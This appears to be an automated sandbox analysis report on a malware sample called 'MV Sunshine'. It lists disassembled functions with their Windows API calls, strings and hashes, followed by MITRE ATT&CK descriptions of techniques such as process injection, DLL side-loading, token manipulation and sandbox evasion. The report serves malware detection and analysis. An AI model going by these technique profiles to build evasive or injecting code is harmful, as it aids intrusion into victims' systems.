Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 1c7cff6b1190b6b9d27303b09b7ea88929e7cde6b4d422d725a80e2f97b8c8b1
Instruction ID: a0de3f89ceb5b585f1cb24337e91f6227e79fe2eafb495264a7bae53159f80d0
Opcode Fuzzy Hash: 1c7cff6b1190b6b9d27303b09b7ea88929e7cde6b4d422d725a80e2f97b8c8b1
Instruction Fuzzy Hash: E731E931A0030AABEB24EF58C9897DEBBFBFF05350F14022DED85962A1D7709944CB58

Function 006A6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006A69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006A69DB

Strings

Combobox, xrefs: 006A699D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 4d4f303e4f1c1850efd60a0bdfa5876b7d089073cdb9c596f2b330f55eaa9c26
Instruction ID: f8129e200220669c9230d23aa746a7bdc5678dc4c89c0348f0781c1ac0159f5b
Opcode Fuzzy Hash: 4d4f303e4f1c1850efd60a0bdfa5876b7d089073cdb9c596f2b330f55eaa9c26
Instruction Fuzzy Hash: 3A11B27160020AAFEF11AF14CC80EEB376FEB9A3A4F150129F9589B391D6719C518FA0

Function 006A6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00621D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00621D73
Part of subcall function 00621D35: GetStockObject.GDI32(00000011), ref: 00621D87
Part of subcall function 00621D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00621D91

GetWindowRect.USER32(00000000,?), ref: 006A6EE0
GetSysColor.USER32(00000012), ref: 006A6EFA

Strings

static, xrefs: 006A6EBD

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 463c1e92f7c9cbae4ffe1a9defa44a763e5abea9aac1c81ab52ac30233b9e674
Instruction ID: 0f3c3df6511ca592e44fe6f16ef431c03f6779d6d11fb2b3d18f49a97f491f47
Opcode Fuzzy Hash: 463c1e92f7c9cbae4ffe1a9defa44a763e5abea9aac1c81ab52ac30233b9e674
Instruction Fuzzy Hash: 73215972610209AFDF04EFA8DC45AEA7BBAFB09314F045628FA55D3250D634E8619F60

Function 006A6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006A6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006A6C20

Strings

edit, xrefs: 006A6BF5

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 9b718eef7169bd0588549ede74f8807d4bdbd09a88363033f2693ed297772e09
Instruction ID: 98bebeba47fd117476cfc6e97c9476b22acce9c2d6ba449ca303256e197d90fe
Opcode Fuzzy Hash: 9b718eef7169bd0588549ede74f8807d4bdbd09a88363033f2693ed297772e09
Instruction Fuzzy Hash: FF116D71500208ABEB106F64DC41AEA376BEB16378F144724F961D72E0C775ECA19F60

Function 00682E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00682F30

Strings

0, xrefs: 00682F07

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 23724a5fbc143dddd1c4cbb1f88148aaedf201ad76c3308ae2b02fc2d38b625a
Instruction ID: 84c64a857e4ba09ee159348fe3c82041cf69e93c3038f7855c0539685589a1ce
Opcode Fuzzy Hash: 23724a5fbc143dddd1c4cbb1f88148aaedf201ad76c3308ae2b02fc2d38b625a
Instruction Fuzzy Hash: 5911D031901216ABCB30FB58DD58BDA77BBEB11350F0402B6F944A73A0D7B0AD05C795

Function 006924CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00692520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00692549

Strings

<local>, xrefs: 00692511

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fb69392b2e6201e0685e6374fee28d5b6d5f68961aee9e0e86ee66c98086fbb6
Instruction ID: ef4c0ca1367912e094ec4babd23bb96a897cadb3528e1b5032dad545361cdfc0
Opcode Fuzzy Hash: fb69392b2e6201e0685e6374fee28d5b6d5f68961aee9e0e86ee66c98086fbb6
Instruction Fuzzy Hash: 01110670500226BADF248F51CCA4EFBFFAEFF06751F10812AF90582540D270A981DAF0

Function 006980A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0069830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006980C8,?,00000000,?,?), ref: 00698322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006980CB
htons.WSOCK32(00000000,?,00000000), ref: 00698108

Strings

255.255.255.255, xrefs: 006980E3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 21d864e78ac17c8dfd8c7ddaab3f01ccb00a0315304dd41f848c62d60f5c084f
Instruction ID: c621ea7dbd90d0c4639318380f3345e2321d60cb2e53870975ae41acac4c1860
Opcode Fuzzy Hash: 21d864e78ac17c8dfd8c7ddaab3f01ccb00a0315304dd41f848c62d60f5c084f
Instruction Fuzzy Hash: 8D11E534600205AFCF20AFA4DC46FFDB32AFF16320F10851BF91297791DA31A811CA59

Function 00630A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00623C26,006E62F8,?,?,?), ref: 00630ACE

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

_wcscat.LIBCMT ref: 006650E1

Strings

cn, xrefs: 00630B0E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: cn
API String ID: 257928180-15458471
Opcode ID: c8d59bfcc21607afbf917c94513c9c5a20dfa95f6832072e4bbcce1a68313d96
Instruction ID: efa514d7dfcdbf1ad7e5a8ef1d7067b35589702e0fdf450253140452c4aa2290
Opcode Fuzzy Hash: c8d59bfcc21607afbf917c94513c9c5a20dfa95f6832072e4bbcce1a68313d96
Instruction Fuzzy Hash: BB11A534A052189B8B80EBA4DC11ED9B7BFEF08350F0004A9B949D7241EA70EB888B65

Function 006792E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 0067B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0067B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00679355

Strings

ListBox, xrefs: 0067931F
ComboBox, xrefs: 006792F4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 71938d5377f55abe8301d12a7f774f7f72e124e63fd5813ae42bb40044f9630d
Instruction ID: 878e9193ffefbd6092803286b79c87e7ae52a50bfe6c6b6a2c339269a52594de
Opcode Fuzzy Hash: 71938d5377f55abe8301d12a7f774f7f72e124e63fd5813ae42bb40044f9630d
Instruction Fuzzy Hash: 9001F171A05224ABCB04EBA4CC92CFE73ABBF06320B14461DF936673D1EB315808CA60

Function 006791DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 0067B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0067B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0067924D

Strings

ListBox, xrefs: 00679217
ComboBox, xrefs: 006791EC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: f86482486824569cba101f63cbdfb549bd9d868a3096341f38aece7532bc10a2
Instruction ID: 53052079aa67f9bba4e355733f89e6e195ec92a302bac275f08cf81c1c6eeda0
Opcode Fuzzy Hash: f86482486824569cba101f63cbdfb549bd9d868a3096341f38aece7532bc10a2
Instruction Fuzzy Hash: 2D01D471E452047BCB14FBA0D992EFF73AA9F05300F144169B91663292EA216F089AB5

Function 00679264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 0067B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0067B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 006792D0

Strings

ListBox, xrefs: 0067929C
ComboBox, xrefs: 00679271

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 282d161bf0bbe8606265603f752c669569e9f6b34b9044bc817af0a26168e168
Instruction ID: 286c3041ba3fd766219329b1465866df4b919a4a4ae2c4e2eea7fb012c41c117
Opcode Fuzzy Hash: 282d161bf0bbe8606265603f752c669569e9f6b34b9044bc817af0a26168e168
Instruction Fuzzy Hash: 2301F271E4121877CF00FBA4D982EFF73AE9F01300F244129B91673282DA215F089AB5

Function 00646DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00646DD0
__calloc_crt.LIBCMT ref: 00646DE9

Strings

@Rn, xrefs: 00646E00

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __calloc_crt
String ID: @Rn
API String ID: 3494438863-2908497755
Opcode ID: c2423edff8039807a386f5a2e84c0a68739c2ddc10c09bfb294542689cdd94d6
Instruction ID: 2ee1def983d388ab60a4ea0eea586093b02874484657838661131fea926d02c1
Opcode Fuzzy Hash: c2423edff8039807a386f5a2e84c0a68739c2ddc10c09bfb294542689cdd94d6
Instruction Fuzzy Hash: F0F04471B087169FF7648F14FD516952B97EB12760B14442BF201CF290EBB089824685

Function 006851CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006851E8
_wcscmp.LIBCMT ref: 006851FA

Strings

#32770, xrefs: 006851F4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: c1d761e8e13d49403701023759e7bb9abd315207e1d06ca571cce66f9931d434
Instruction ID: bc51ba605c3df9ccbd571e062235070bcbfa1f5240f262a67f02fc26d6364f26
Opcode Fuzzy Hash: c1d761e8e13d49403701023759e7bb9abd315207e1d06ca571cce66f9931d434
Instruction Fuzzy Hash: DCE0613290432C17D310ABD5AC45FA7F7ADEB41731F00015BFD10D3140D5609A058BD1

Function 006781BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006781CA

Part of subcall function 00643598: _doexit.LIBCMT ref: 006435A2

Strings

Error allocating memory., xrefs: 006781C3
AutoIt, xrefs: 006781BE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 9d59c71a034187196b057074f97fb38260f9068a002dac3b2ac6b37e17dce867
Instruction ID: ebf968ae41a45a6630adf87748f8e6ab84845966768ad836944335ae87a8b2f9
Opcode Fuzzy Hash: 9d59c71a034187196b057074f97fb38260f9068a002dac3b2ac6b37e17dce867
Instruction Fuzzy Hash: 1DD012322C532836D35433A46C0ABC56A8A4B16B51F44441ABB08596D38ED559C146AD

Function 0065B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0065B564: _memset.LIBCMT ref: 0065B571

Part of subcall function 00640B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0065B540,?,?,?,0062100A), ref: 00640B89

IsDebuggerPresent.KERNEL32(?,?,?,0062100A), ref: 0065B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0062100A), ref: 0065B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0065B54E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: b12423e2e1e7069373a479546714f367d8dfd7134ba0998c0809b78ce7ef1126
Instruction ID: 04ec2422c40944d96c4a666b6c2b74b1dff8d34cc453ef286fabc9e0aeff7606
Opcode Fuzzy Hash: b12423e2e1e7069373a479546714f367d8dfd7134ba0998c0809b78ce7ef1126
Instruction Fuzzy Hash: 89E092B02007128FE765EF68E4047427BE2EF04745F00992CE846C7351E7B4E548CFA1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

